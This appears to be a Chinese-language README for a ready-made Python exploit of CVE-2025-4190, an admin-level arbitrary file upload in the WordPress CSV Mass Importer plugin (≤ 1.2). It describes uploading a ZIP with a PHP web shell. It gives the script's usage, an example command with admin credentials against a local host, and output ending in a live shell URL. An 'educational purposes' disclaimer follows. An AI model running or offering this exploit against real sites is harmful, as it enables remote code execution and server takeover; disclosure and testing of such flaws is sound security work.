CSV Mass Importer 插件(≤ 1.2)存在一个 管理员+ 任意文件上传漏洞。
由于对上传文件验证不当,高权限用户(如管理员)可以在服务器上上传任意文件,即使在应受限制的场景下(例如多站点设置)也不例外。
攻击者可利用此漏洞上传 PHP 木马或恶意文件,从而在服务器上实现远程代码执行(RCE)。
由 Nxploited(Khaled Alenazi) 发现。
该插件在使用 CSV 导入功能时未能正确检查上传文件。
精心构造的 ZIP 文件(包含 PHP 木马)可以被上传并解压到公开可访问的目录。
木马路径示例:
<target-url>/wp-content/uploads/cmi-data/nxploited.php
本仓库包含一个现成的 Python 利用脚本:4190.py
python CVE-2025-4190.py --help
usage: 4190.py [-h] --url URL --username USERNAME --password PASSWORD
WordPress CSV Mass Importer <= 1.2 - Admin+ Arbitrary File Upload # By Nxploited (Khaled Alenazi)
options:
-h, --help show this help message and exit
--url, -u URL Target WordPress site URL
--username, -un USERNAME
WordPress admin username
--password, -p PASSWORD
WordPress admin password
python CVE-2025-4190.py -u http://192.168.100.74:888/wordpress -un admin -p admin
[+] Logged in successfully.
[+] Payload 'nxploited.zip' created successfully.
[+] Payload uploaded successfully.
[+] Shell URL: http://192.168.100.74:888/wordpress/wp-content/uploads/cmi-data/nxploited.php
Exploited By Nxploited (Khaled_alenazi)
此代码仅用于教育目的。
作者不对因使用本脚本造成的任何滥用或损害负责。
请负责任地使用,并且仅在你获得授权的系统上测试。
由 Khaled Alenazi (Nxploited) 发现并开发 🌟